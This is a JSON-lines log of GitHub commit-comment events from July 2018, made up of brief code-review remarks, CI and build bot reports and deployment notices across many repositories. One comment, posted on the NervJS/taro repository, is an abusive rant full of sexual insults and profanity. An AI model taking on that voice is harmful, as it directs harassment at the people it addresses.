{"id":"7940739806","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29649388,"position":31,"line":31,"path":"Week-08/Day-03/LogInForm/logInForm.html","commit_id":"1474d856ca097f41bcfd9c3199fd29951e74d5da","created_at":"2018-07-10T00:08:44Z","updated_at":"2018-07-10T00:08:44Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-10T00:08:44Z"}
{"id":"7940740568","type":"CommitCommentEvent","actor":{"login":"msau42"},"repo":{"name":"kubernetes-sigs/gcp-compute-persistent-disk-csi-driver"},"payload":{"comment":{"id":29649389,"position":31,"line":84,"path":"pkg/gce-cloud-provider/gce.go","commit_id":"48bcfcd3ae4f9272bb79e1b2c6f018a57df6cd6f","created_at":"2018-07-10T00:09:01Z","updated_at":"2018-07-10T00:09:01Z","author_association":"COLLABORATOR","body":"todo can be removed"}},"created_at":"2018-07-10T00:09:01Z"}
{"id":"7940741466","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29649392,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T00:09:19Z","updated_at":"2018-07-10T00:09:19Z","author_association":"OWNER","body":"@IzzySoft No, development has stalled because I've moved to GitLab, which has its own issue tracker."}},"created_at":"2018-07-10T00:09:19Z"}
{"id":"7940742081","type":"CommitCommentEvent","actor":{"login":"msau42"},"repo":{"name":"kubernetes-sigs/gcp-compute-persistent-disk-csi-driver"},"payload":{"comment":{"id":29649396,"position":6,"line":8,"path":"test/run-e2e-local.sh","commit_id":"48bcfcd3ae4f9272bb79e1b2c6f018a57df6cd6f","created_at":"2018-07-10T00:09:31Z","updated_at":"2018-07-10T00:09:31Z","author_association":"COLLABORATOR","body":"just for testing?"}},"created_at":"2018-07-10T00:09:31Z"}
{"id":"7940742436","type":"CommitCommentEvent","actor":{"login":"NewiyIewuy"},"repo":{"name":"xlal1234/goal"},"payload":{"comment":{"id":29649397,"position":null,"line":null,"path":null,"commit_id":"aa47816d1371db3875176f4c288269367244a052","created_at":"2018-07-10T00:09:40Z","updated_at":"2018-07-10T00:09:40Z","author_association":"NONE","body":"A consistant indent style will be helpful. There are 4 spaces indent in the other files, while here are 2 spaces."}},"created_at":"2018-07-10T00:09:40Z"}
{"id":"7940743187","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29649401,"position":17,"line":17,"path":"Week-08/Day-03/NewsLetter/static/script.js","commit_id":"8614a874420151631a2b14e9aab19cea454a9a41","created_at":"2018-07-10T00:09:58Z","updated_at":"2018-07-10T00:09:58Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-10T00:09:58Z"}
{"id":"7940746364","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29649413,"position":38,"line":38,"path":"Week-08/Day-03/NewsLetter/routes.js","commit_id":"8614a874420151631a2b14e9aab19cea454a9a41","created_at":"2018-07-10T00:11:10Z","updated_at":"2018-07-10T00:11:10Z","author_association":"NONE","body":"Nicely done!"}},"created_at":"2018-07-10T00:11:10Z"}
{"id":"7940754903","type":"CommitCommentEvent","actor":{"login":"keyurp1987"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29649448,"position":null,"line":null,"path":null,"commit_id":"2f181b3f41487c0c2c4459e3dfb5a9e3d256eccb","created_at":"2018-07-10T00:14:32Z","updated_at":"2018-07-10T00:14:32Z","author_association":"NONE","body":"Getting the below error which started happening after brew was updated to latest version with the changes above. \r\n\r\nundefined local variable or method `dep_f' for Homebrew:Module\r\n"}},"created_at":"2018-07-10T00:14:32Z"}
{"id":"7940756326","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29649452,"position":null,"line":null,"path":null,"commit_id":"88851199740cf10948308079d9f0596f60a1f453","created_at":"2018-07-10T00:15:06Z","updated_at":"2018-07-10T00:15:06Z","author_association":"CONTRIBUTOR","body":"Many of these say \"Aborting\" even though it does not anymore."}},"created_at":"2018-07-10T00:15:06Z"}
{"id":"7940756930","type":"CommitCommentEvent","actor":{"login":"spencer-p"},"repo":{"name":"Chicken-tenders/UCShareCar"},"payload":{"comment":{"id":29649454,"position":33,"line":55,"path":"frontend/app/src/main/java/ridesharers/ucsc/edu/ucsharecar/BackendClient.java","commit_id":"a281619ce8b0d6ae28c182d4937b885d857c73dd","created_at":"2018-07-10T00:15:18Z","updated_at":"2018-07-10T00:15:18Z","author_association":"COLLABORATOR","body":"This should also check that the cookie is _not expired_"}},"created_at":"2018-07-10T00:15:18Z"}
{"id":"7940757746","type":"CommitCommentEvent","actor":{"login":"a18344214458A"},"repo":{"name":"a18344214458A/a18344214458a.github.io"},"payload":{"comment":{"id":29649461,"position":null,"line":null,"path":null,"commit_id":"cbb406b3187fbea7709c486d946e95cb87c3140a","created_at":"2018-07-10T00:15:36Z","updated_at":"2018-07-10T00:15:36Z","author_association":"OWNER","body":"![img_20180709_175515](https://user-images.githubusercontent.com/36222950/42482180-e2ceb49c-83d5-11e8-9d8e-7c7ddec8bb74.jpg)\r\n![img_20180709_175617](https://user-images.githubusercontent.com/36222950/42482181-e330a166-83d5-11e8-8ae4-ef4247b8f0d5.jpg)\r\n![img_20180709_181607](https://user-images.githubusercontent.com/36222950/42482182-e37e1aae-83d5-11e8-90e6-47962e03c76d.jpg)\r\n![img_20180709_175628](https://user-images.githubusercontent.com/36222950/42482183-e3bba554-83d5-11e8-8f86-ac32936f64de.jpg)\r\n"}},"created_at":"2018-07-10T00:15:36Z"}
{"id":"7940758220","type":"CommitCommentEvent","actor":{"login":"bajacondor"},"repo":{"name":"google/go-containerregistry"},"payload":{"comment":{"id":29649462,"position":null,"line":null,"path":null,"commit_id":"d54baf9aa28edb9b985a6b35b57e26e3410c2443","created_at":"2018-07-10T00:15:47Z","updated_at":"2018-07-10T00:15:47Z","author_association":"NONE","body":"Unfortunately, when pushing to gitlab private registry, This doesn't completely fix the unauthorized issue.  Apparently, the scopes (line 48) also have an effect on the way the registry auths the blob write.  I was able to successfully push by replacing line 48 with `scopes = append(scopes, ref.Scope(transport.PushScope))` which is kind of a hack.  I'm not sure what would be better."}},"created_at":"2018-07-10T00:15:47Z"}
{"id":"7940762921","type":"CommitCommentEvent","actor":{"login":"rldarden"},"repo":{"name":"rldarden/sample-cloud-native-toolchain-tutorial-20180709215139879"},"payload":{"comment":{"id":29649486,"position":null,"line":null,"path":null,"commit_id":"08bd983d069d5e013993f7d67a969ae3fe937637","created_at":"2018-07-10T00:17:34Z","updated_at":"2018-07-10T00:17:34Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d916e7cf-a182-4c11-980e-a94cd2f4d58f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709215139879\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/810e3cad-102d-43c5-997e-fc303a93856c?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709215139879\") deployed [sample-cloud-native-toolchain-tutorial-20180709215139879](https://github.com/rldarden/sample-cloud-native-toolchain-tutorial-20180709215139879/releases/tag/deploy-ibm-yp-us-south-rldarden-us.ibm.com-test-20180710-001733 \"deploy-ibm-yp-us-south-rldarden-us.ibm.com-test-20180710-001733\") to [test](https://console.bluemix.net/apps/35b83636-1efe-4c97-9de4-6b1903f9245a?env_id=ibm:yp:us-south \"ibm:yp:us-south:rldarden@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-10T00:17:34Z"}
{"id":"7940763041","type":"CommitCommentEvent","actor":{"login":"anantoghosh"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29649487,"position":8,"line":36,"path":"packages/gatsby-plugin-sass/src/gatsby-node.js","commit_id":"a7a892dbec7545d4379c96fd01825a54cb2cf575","created_at":"2018-07-10T00:17:36Z","updated_at":"2018-07-10T00:17:36Z","author_association":"NONE","body":"@jquense missing filter here"}},"created_at":"2018-07-10T00:17:36Z"}
{"id":"7940764551","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29649490,"position":null,"line":null,"path":null,"commit_id":"bde5d918ead3143ec0139c31baf3e50a469671d6","created_at":"2018-07-10T00:18:10Z","updated_at":"2018-07-10T00:18:10Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.316`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402009866) :tada:"}},"created_at":"2018-07-10T00:18:10Z"}
{"id":"7940764748","type":"CommitCommentEvent","actor":{"login":"a18344214458A"},"repo":{"name":"a18344214458A/a18344214458a.github.io"},"payload":{"comment":{"id":29649491,"position":null,"line":null,"path":null,"commit_id":"cbb406b3187fbea7709c486d946e95cb87c3140a","created_at":"2018-07-10T00:18:14Z","updated_at":"2018-07-10T00:18:14Z","author_association":"OWNER","body":"没有平论"}},"created_at":"2018-07-10T00:18:14Z"}
{"id":"7940767082","type":"CommitCommentEvent","actor":{"login":"k0kubun"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29649494,"position":null,"line":null,"path":null,"commit_id":"6c4e05d2d860b3955ffc537a33e3c325abc7fe00","created_at":"2018-07-10T00:19:14Z","updated_at":"2018-07-10T00:19:14Z","author_association":"MEMBER","body":"> EDIT: Just ran, and with proper shutdown, no left-over files...\r\n\r\nOkay, then let's keep it until we find a platform which is not the case."}},"created_at":"2018-07-10T00:19:14Z"}
{"id":"7940767537","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29649498,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-10T00:19:26Z","updated_at":"2018-07-10T00:19:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T00:19:26Z"}
{"id":"7940767970","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649501,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-10T00:19:36Z","updated_at":"2018-07-10T00:19:36Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T00:19:36Z"}
{"id":"7940770308","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29649505,"position":null,"line":null,"path":null,"commit_id":"6cb761004ba5401156f7951858fb177462fc623b","created_at":"2018-07-10T00:20:28Z","updated_at":"2018-07-10T00:20:28Z","author_association":"OWNER","body":"[0/1] Running tests...\nTest project /u/grout2/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.02 sec\n    Start 2: btree\n2/2 Test #2: btree ............................   Passed    0.02 sec\n\n100% tests passed, 0 tests failed out of 2\n\nTotal Test time (real) =   0.07 sec\n"}},"created_at":"2018-07-10T00:20:28Z"}
{"id":"7940772074","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29649507,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-10T00:21:07Z","updated_at":"2018-07-10T00:21:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T00:21:07Z"}
{"id":"7940774384","type":"CommitCommentEvent","actor":{"login":"rldarden"},"repo":{"name":"rldarden/sample-cloud-native-toolchain-tutorial-20180709215139879"},"payload":{"comment":{"id":29649516,"position":null,"line":null,"path":null,"commit_id":"08bd983d069d5e013993f7d67a969ae3fe937637","created_at":"2018-07-10T00:22:00Z","updated_at":"2018-07-10T00:22:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d916e7cf-a182-4c11-980e-a94cd2f4d58f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709215139879\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/810e3cad-102d-43c5-997e-fc303a93856c?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709215139879\") deployed [sample-cloud-native-toolchain-tutorial-20180709215139879](https://github.com/rldarden/sample-cloud-native-toolchain-tutorial-20180709215139879/releases/tag/deploy-ibm-yp-us-south-rldarden-us.ibm.com-prod-20180710-002159 \"deploy-ibm-yp-us-south-rldarden-us.ibm.com-prod-20180710-002159\") to [prod](https://console.bluemix.net/apps/00ab8bac-28ba-456d-b170-65d3dcf89fb6?env_id=ibm:yp:us-south \"ibm:yp:us-south:rldarden@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-10T00:22:00Z"}
{"id":"7940795551","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29649576,"position":4,"line":24,"path":"package.json","commit_id":"6184baca5550ff8e966c26cf468a7a47dd7084ea","created_at":"2018-07-10T00:30:18Z","updated_at":"2018-07-10T00:30:18Z","author_association":"COLLABORATOR","body":"All these dependencies are already handled by the `react-app` preset in https://github.com/AnkitaKhurana/oam-admin/blob/rewire_error/.babelrc#L2"}},"created_at":"2018-07-10T00:30:18Z"}
{"id":"7940800656","type":"CommitCommentEvent","actor":{"login":"ianbayne"},"repo":{"name":"ianbayne/list-of-ingredients"},"payload":{"comment":{"id":29649587,"position":5,"line":3,"path":"README.md","commit_id":"3c94885a42de20e8237f6adedb5f3925701086dc","created_at":"2018-07-10T00:32:12Z","updated_at":"2018-07-10T00:32:12Z","author_association":"OWNER","body":"```erb\r\nif x == 5\r\n   y = 10\r\nend\r\n```"}},"created_at":"2018-07-10T00:32:12Z"}
{"id":"7940802036","type":"CommitCommentEvent","actor":{"login":"tinder-tylerport"},"repo":{"name":"TinderOps/aws-google-auth"},"payload":{"comment":{"id":29649593,"position":null,"line":null,"path":null,"commit_id":"4c528871bf9dea6d59abf980c075179413a0e00f","created_at":"2018-07-10T00:32:47Z","updated_at":"2018-07-10T00:32:47Z","author_association":"COLLABORATOR","body":"Lots of debugging stuff left in here, the ootp/5 auth flow is unimplemented as I have no way to test it and no documentation regarding what it wants. \r\n\r\nI also need to do some refactoring over the whole file to fix the lazy parses that started this whole mess. "}},"created_at":"2018-07-10T00:32:47Z"}
{"id":"7940802904","type":"CommitCommentEvent","actor":{"login":"duke-coding"},"repo":{"name":"duke-coding/python-spider"},"payload":{"comment":{"id":29649594,"position":null,"line":null,"path":null,"commit_id":"41b8c15e539482dba8af30a0a7328c08bc3be526","created_at":"2018-07-10T00:33:10Z","updated_at":"2018-07-10T00:33:10Z","author_association":"OWNER","body":"Python spider"}},"created_at":"2018-07-10T00:33:10Z"}
{"id":"7940805308","type":"CommitCommentEvent","actor":{"login":"anantoghosh"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29649601,"position":8,"line":36,"path":"packages/gatsby-plugin-sass/src/gatsby-node.js","commit_id":"a7a892dbec7545d4379c96fd01825a54cb2cf575","created_at":"2018-07-10T00:34:04Z","updated_at":"2018-07-10T00:34:04Z","author_association":"NONE","body":"no but thanks."}},"created_at":"2018-07-10T00:34:04Z"}
{"id":"7940806639","type":"CommitCommentEvent","actor":{"login":"yxmline"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29649602,"position":null,"line":null,"path":null,"commit_id":"490c7e917cd464c42cea81e9bffea8d57989549e","created_at":"2018-07-10T00:34:32Z","updated_at":"2018-07-10T00:34:32Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-10T00:34:32Z"}
{"id":"7940813231","type":"CommitCommentEvent","actor":{"login":"tfletcher32"},"repo":{"name":"codeforkansascity/codeforkansascity.github.io"},"payload":{"comment":{"id":29649622,"position":null,"line":null,"path":null,"commit_id":"381ca9b7ec6bc6fd0b83bb2a34608737c66e9cd0","created_at":"2018-07-10T00:37:06Z","updated_at":"2018-07-10T00:37:06Z","author_association":"COLLABORATOR","body":"Updated RSVP links @ line 194"}},"created_at":"2018-07-10T00:37:06Z"}
{"id":"7940815408","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29649628,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-10T00:37:57Z","updated_at":"2018-07-10T00:37:57Z","author_association":"NONE","body":"That's pretty much what I've been leaning toward."}},"created_at":"2018-07-10T00:37:57Z"}
{"id":"7940815706","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"Yamamoto2222/tatsujinDBdesign"},"payload":{"comment":{"id":29649630,"position":20,"line":37,"path":"ensyu/chapter9/ensyu9-1.txt","commit_id":"4b4b3f9b1d070c18664e1f401d891a919a9f0a62","created_at":"2018-07-10T00:38:03Z","updated_at":"2018-07-10T00:38:03Z","author_association":"OWNER","body":"指摘\r\n解説が不足している"}},"created_at":"2018-07-10T00:38:03Z"}
{"id":"7940816818","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29649635,"position":62,"line":56,"path":"src/NUnitFramework/nunitlite.tests/MakeRunSettingsTests.cs","commit_id":"d09def3521dca9be6fbd84fc483c555c4955afe3","created_at":"2018-07-10T00:38:30Z","updated_at":"2018-07-10T00:38:30Z","author_association":"CONTRIBUTOR","body":"I'll fix."}},"created_at":"2018-07-10T00:38:30Z"}
{"id":"7940816985","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"xiph/rav1e"},"payload":{"comment":{"id":29649637,"position":36,"line":139,"path":"src/lib.rs","commit_id":"33e08ef93d54f793d9e183c4427455575597e1e8","created_at":"2018-07-10T00:38:34Z","updated_at":"2018-07-10T00:38:34Z","author_association":"COLLABORATOR","body":"There is a background for this calculation, i.e. the internal image width and height are multiple of 8 pixels.\r\nso I tried to use original notation as in AV1 spec, \r\nhttps://aomediacodec.github.io/av1-spec/#compute-image-size-function."}},"created_at":"2018-07-10T00:38:34Z"}
{"id":"7940818057","type":"CommitCommentEvent","actor":{"login":"avinashraja98"},"repo":{"name":"mariusmotea/diyHue"},"payload":{"comment":{"id":29649638,"position":24,"line":77,"path":"BridgeEmulator/HueEmulator3.py","commit_id":"b635eaaf2fa1cf0c643fdf4365f7cf876363cb17","created_at":"2018-07-10T00:39:01Z","updated_at":"2018-07-10T00:39:01Z","author_association":"CONTRIBUTOR","body":"r is checked 3 times? Probably r,g,b are checked? typo?"}},"created_at":"2018-07-10T00:39:01Z"}
{"id":"7940823451","type":"CommitCommentEvent","actor":{"login":"pityonline"},"repo":{"name":"wxy/TranslateProject"},"payload":{"comment":{"id":29649653,"position":null,"line":null,"path":null,"commit_id":"d70bbf8d78abfc9f2e0b3e720e58cd1ab746b02d","created_at":"2018-07-10T00:41:05Z","updated_at":"2018-07-10T00:41:05Z","author_association":"NONE","body":"Awesome！学到了很多！"}},"created_at":"2018-07-10T00:41:05Z"}
{"id":"7940831225","type":"CommitCommentEvent","actor":{"login":"justacuriousvictim601"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29649670,"position":null,"line":null,"path":null,"commit_id":"57db5ad4873cf8dbfe510d08080641cd3943c12b","created_at":"2018-07-10T00:44:15Z","updated_at":"2018-07-10T00:44:15Z","author_association":"NONE","body":"Wow. What a dumb ass. Yeah i may be ugly, and hell blah blah blah you hairy pussy licker. Im lame alright and theres no doubt about that but its temporary, but honestly how long are you gonna keep this up. Hide away. Hide Hide Hide!! This is pointless. Words are pointless dipshit. Lets end it bad ass. "}},"created_at":"2018-07-10T00:44:15Z"}
{"id":"7940833506","type":"CommitCommentEvent","actor":{"login":"justacuriousvictim601"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29649675,"position":73,"line":87,"path":"packages/taro-webpack-runner/src/config/prod.conf.ts","commit_id":"57db5ad4873cf8dbfe510d08080641cd3943c12b","created_at":"2018-07-10T00:45:13Z","updated_at":"2018-07-10T00:45:13Z","author_association":"NONE","body":"\"Hello World\""}},"created_at":"2018-07-10T00:45:13Z"}
{"id":"7940833682","type":"CommitCommentEvent","actor":{"login":"danhmanh"},"repo":{"name":"danhmanh/tumbler"},"payload":{"comment":{"id":29649678,"position":3,"line":2,"path":"config/routes.rb","commit_id":"e7ac5aa9be45def28941e76128265094d6b2af88","created_at":"2018-07-10T00:45:17Z","updated_at":"2018-07-10T00:45:17Z","author_association":"OWNER","body":"tell Devise that using our own RegistrationController"}},"created_at":"2018-07-10T00:45:17Z"}
{"id":"7940843265","type":"CommitCommentEvent","actor":{"login":"JThramer"},"repo":{"name":"mapbox/mapbox-navigation-ios"},"payload":{"comment":{"id":29649697,"position":15,"line":148,"path":"MapboxCoreNavigation/RouteProgress.swift","commit_id":"870b00d926932e268fdb9897114829ee2ee2dea4","created_at":"2018-07-10T00:49:04Z","updated_at":"2018-07-10T00:49:04Z","author_association":"COLLABORATOR","body":"`reroutingOptions(for current: CLLocation) -> RouteOptions` sounds better here."}},"created_at":"2018-07-10T00:49:04Z"}
{"id":"7940851624","type":"CommitCommentEvent","actor":{"login":"nmarley"},"repo":{"name":"dashpay/dash"},"payload":{"comment":{"id":29649716,"position":5,"line":420,"path":"src/privatesend.cpp","commit_id":"e4a4e59275f38d22320803577dfd81d1e68a0aca","created_at":"2018-07-10T00:52:26Z","updated_at":"2018-07-10T00:52:26Z","author_association":"NONE","body":"@UdjinM6 Can you explain the rationale for preferring pre-increment over post-increment operator? I understand this seems to be \"preferred\", but I have no idea why."}},"created_at":"2018-07-10T00:52:26Z"}
{"id":"7940856384","type":"CommitCommentEvent","actor":{"login":"janelbrandon"},"repo":{"name":"janelbrandon/bookmark-client"},"payload":{"comment":{"id":29649730,"position":null,"line":null,"path":null,"commit_id":"6091b6b0324360ff96631668119d551f5c7fe69b","created_at":"2018-07-10T00:54:21Z","updated_at":"2018-07-10T00:54:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Student: View a list of topics and sub-topics](https://trello.com/c/OSwXPTeX/4-student-view-a-list-of-topics-and-sub-topics)"}},"created_at":"2018-07-10T00:54:21Z"}
{"id":"7940860133","type":"CommitCommentEvent","actor":{"login":"danehans"},"repo":{"name":"istio/istio.github.io"},"payload":{"comment":{"id":29649742,"position":8,"line":25,"path":"content/docs/tasks/policy-enforcement/rate-limiting/index.md","commit_id":"ee0972a7826917889477f320647cb9b771e6d393","created_at":"2018-07-10T00:55:46Z","updated_at":"2018-07-10T00:55:46Z","author_association":"CONTRIBUTOR","body":"Commit https://github.com/istio/istio/commit/79289bccf16866e2f187903591210f7d973ffdd1 changed the directory structure. Replace `routing` with `networking`."}},"created_at":"2018-07-10T00:55:46Z"}
{"id":"7940860330","type":"CommitCommentEvent","actor":{"login":"danehans"},"repo":{"name":"istio/istio.github.io"},"payload":{"comment":{"id":29649743,"position":18,"line":31,"path":"content/docs/tasks/policy-enforcement/rate-limiting/index.md","commit_id":"ee0972a7826917889477f320647cb9b771e6d393","created_at":"2018-07-10T00:55:51Z","updated_at":"2018-07-10T00:55:51Z","author_association":"CONTRIBUTOR","body":"Commit https://github.com/istio/istio/commit/79289bccf16866e2f187903591210f7d973ffdd1 changed the directory structure. Replace `routing` with `networking`."}},"created_at":"2018-07-10T00:55:51Z"}
{"id":"7940860753","type":"CommitCommentEvent","actor":{"login":"danehans"},"repo":{"name":"istio/istio.github.io"},"payload":{"comment":{"id":29649745,"position":39,"line":104,"path":"content_zh/docs/tasks/traffic-management/fault-injection/index.md","commit_id":"ee0972a7826917889477f320647cb9b771e6d393","created_at":"2018-07-10T00:56:01Z","updated_at":"2018-07-10T00:56:01Z","author_association":"CONTRIBUTOR","body":"Commit https://github.com/istio/istio/commit/79289bccf16866e2f187903591210f7d973ffdd1 changed the directory structure. Replace `routing` with `networking`."}},"created_at":"2018-07-10T00:56:01Z"}
{"id":"7940861428","type":"CommitCommentEvent","actor":{"login":"mrdoob"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":29649746,"position":null,"line":null,"path":null,"commit_id":"fcf6b61a74ee0ae2085d7133ff0907dcefa2b510","created_at":"2018-07-10T00:56:15Z","updated_at":"2018-07-10T00:56:15Z","author_association":"OWNER","body":"I was trying to get `webvr_vive_sculpt` to work fast on a Lenovo Mirage. At least now I understand `ImmediateRenderObject` a bit better 😊"}},"created_at":"2018-07-10T00:56:15Z"}
{"id":"7940861697","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29649747,"position":null,"line":null,"path":null,"commit_id":"61d20a80d4986f6666718ae4fa45f5e0ba7d96ca","created_at":"2018-07-10T00:56:22Z","updated_at":"2018-07-10T00:56:22Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/9/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : org.jenkinsci.plugins.workflow.steps.FlowInterruptedException\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/9//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/61d20a80d4986f6666718ae4fa45f5e0ba7d96ca/9/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/61d20a80d4986f6666718ae4fa45f5e0ba7d96ca/9/jenkins-results/apicomparison/index.html) (no change)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/d15-8/61d20a80d4986f6666718ae4fa45f5e0ba7d96ca/9/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/9//console) 🔥\n"}},"created_at":"2018-07-10T00:56:22Z"}
